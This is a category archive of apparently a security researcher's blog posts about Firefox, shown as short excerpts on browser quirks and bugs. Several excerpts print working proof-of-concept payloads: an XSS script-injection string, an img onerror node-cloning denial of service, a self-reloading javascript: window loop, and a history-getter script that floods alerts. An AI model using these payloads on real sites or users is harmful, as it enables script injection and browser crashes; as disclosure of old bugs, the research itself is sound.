Category Archives: Firefox

Can all mozilla people look away now please

Custom setter syntax is being removed from Firefox in the next version... boo, I hear you say, well, at least some of you. If you don’t know, Firefox decided it would create its own setter syntax (I love it when you do that, you know) ages ago, and it looked something like this:-

a setter=alert,a=1//calls alert(1)

Whacky [...]

DOM DOS Firefox

Check this DOS in Firefox:-

<img src="" onerror="appendChild(cloneNode(appendChild(cloneNode(1))))">

There are many DOM-related Firefox problems; this was one of the more interesting ones I found.

WebFu crouching tab hidden dos

Hello my student, here I’ll show you the way of the tiger. If a deadly Firefox ninja approaches your dojo with an XSS punch:-

"><script>alert(/XSS PUNCH!/)</script>

Then you can respond with the crouching tab hidden dos move:-

self.location = "javascript:window.open('javascript:document.clear();document.open();document.close();self.location=self.location')";

This move can frustrate your opponent into submission.

Firefox history DOS attack

Here’s a complete DOS attack on Firefox using the history object:-

window.onload = function() {
    history.__defineGetter__("x", function() {
        for(i in this) {
            try {
                alert(this[i]);
            } catch(e) {
            }
        }
    });

    history.x;
}

Tested on Firefox 2.0.0.9 mac, a window pops up with [...]

Spoofing Firefox protected objects

I’ve been hacking Firefox in my spare time and I thought that it had adequate protection against spoofing properties like document.domain. I was wrong. This could turn into a browser exploit in future if the spoofed objects are accepted by Firefox internally (I don’t think they are, but you never know).
There are [...]

Noscript has iframe protection

For those of you that read my blog, you’ll know that I’m not a big fan of iframes for various reasons. I wrote a JavaScript/CSS scanner which uses them to scan a local area network. There was no easy way to actually prevent this stuff until now... NoScript now has iframe protection, which is fantastic news, [...]